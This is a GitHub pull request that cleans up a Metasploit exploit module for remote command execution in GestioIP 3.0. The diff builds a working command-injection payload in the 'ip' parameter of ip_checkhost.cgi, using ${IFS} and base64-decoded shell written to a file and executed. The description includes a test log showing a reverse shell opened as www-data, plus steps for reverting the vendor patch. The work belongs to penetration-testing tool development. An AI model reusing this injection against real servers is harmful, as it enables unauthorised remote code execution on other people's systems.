### PR TITLE
First set of fixes for gestioip_exec

### DIFF
--- a/modules/exploits/multi/http/gestioip_exec.rb
+++ b/modules/exploits/multi/http/gestioip_exec.rb
@@ -36,9 +36,9 @@ class Metasploit4 < Msf::Exploit::Remote
         {
           'Space'       => 475, # not a lot of room
           'DisableNops' => true,
-          'BadChars'    => "#",
+          'BadChars'    => "",
         },
-      'Platform'        => [ 'unix', 'win', 'linux' ],
+      'Platform'        => [ 'unix' ],
       'Arch'            => ARCH_CMD,
       'Targets'         => [[ 'Automatic GestioIP 3.0', { }]],
       'Privileged'      => false,
@@ -47,14 +47,10 @@ class Metasploit4 < Msf::Exploit::Remote
 
     register_options(
     [
-      OptString.new('URI', [true, 'URI', '/gestioip/']),
+      OptString.new('TARGETURI', [true, 'URI', '/gestioip/']),
       OptString.new('USERNAME', [false, 'The username to auth as', 'gipadmin']),
       OptString.new('PASSWORD', [false, 'The password to auth with', nil])
     ], self.class)
-  end
-
-  def uri
-    datastore['URI']
   end
 
   def user
@@ -70,16 +66,30 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def exploit
-    headers = {}
-    if use_auth
-      headers['Authorization'] = "Basic " + Rex::Text.encode_base64("#{user}:#{pass}")
-    end
 
     pay = Rex::Text.encode_base64(payload.encoded)
-    file = Rex::Text.rand_text_alpha(8);
-    send_request_cgi({
-      'uri' => uri+"ip_checkhost.cgi?ip=2607:f0d0:$(echo${IFS}" + pay + "|base64${IFS}--decode|tee${IFS}"+file+"&&sh${IFS}"+file+"):0000:0000:0000:0000:0004&hostname=fsd&client_id=1&ip_version=",
-      'headers' => headers
-    })
+    file = Rex::Text.rand_text_alpha(8)
+
+    options = {
+      'uri' => normalize_uri(target_uri.path, "ip_checkhost.cgi"),
+      'encode_params' => false,
+      'vars_get' => {
+          'ip' => "2607:f0d0:$(echo${IFS}" + pay + "|base64${IFS}--decode|tee${IFS}"+file+"&&sh${IFS}"+file+"):0000:0000:0000:0000:0004",
+          'hostname' => "fds",
+          'client_id' => "1",
+          'ip_version' => ""
+      }
+    }
+
+    if use_auth
+      options.merge!('authorization' => basic_auth(user,pass))
+    end
+
+    res = send_request_cgi(options)
+
+    if res and res.code == 401
+      fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Please provide USERNAME and PASSOWRD")
+    end
+
   end
 end


### PR DESCRIPTION
This pull request tries to clean a little the https://github.com/rapid7/metasploit-framework/pull/2461
- Currently there are only two platforms compatible with CMD arch "windows" and "unix" but because of the specific encoding of the payload done here, it's only compatible with the "unix" platform. Hasn't sense to make it compatible with "windows" and "linux" platforms.
- Since the payload is being enccode into base64 badchars don't apply here.
- Use the APIs from Msf::Exploit::Remote::HttpClient as expected.

On the other hand, I dunno if  the badchars analysis for this module has been done.Would love to listen feedback from @brandonprry . If the space is the only badchar, it should be correctly handled by the  actual CMD encoders. If there are other badchars, the BadChars field should be populated correctly and allow the encoder to make its work. If any encoder is able to make it, then it's legit (I think) make your own trick to execute the payload (like the base64 encoding done in this module).

In the meanwhile this pull request tries to address the easy fixes, would love to listen feedback from @brandonprry about the badchars thing, and also if he is interested in work on it :)

Test after changes:

```
msf exploit(gestioip_exec) > set PASSWORD juan
PASSWORD => juan
msf exploit(gestioip_exec) > rexploit
[*] Reloading module...

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo gkRTQZeITlhVUuoT;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "gkRTQZeITlhVUuoT\r\n"
i[*] Matching...
[*] B is input...
d[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.154:48358) at 2013-10-04 13:26:15 -0500


uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y

[*] 192.168.172.154 - Command shell session 1 closed.  Reason: User exit

```

Verification
- [ ] Install GestioIPv3 which can be downloaded here http://sourceforge.net/projects/gestioip/files/latest/download?source=files . I've done it on a ubuntu 10.04
- [ ] Undo the patch here: http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/
- [ ] Restart the apache2 service
- [ ] Test the module like the demo above, should provide a shell
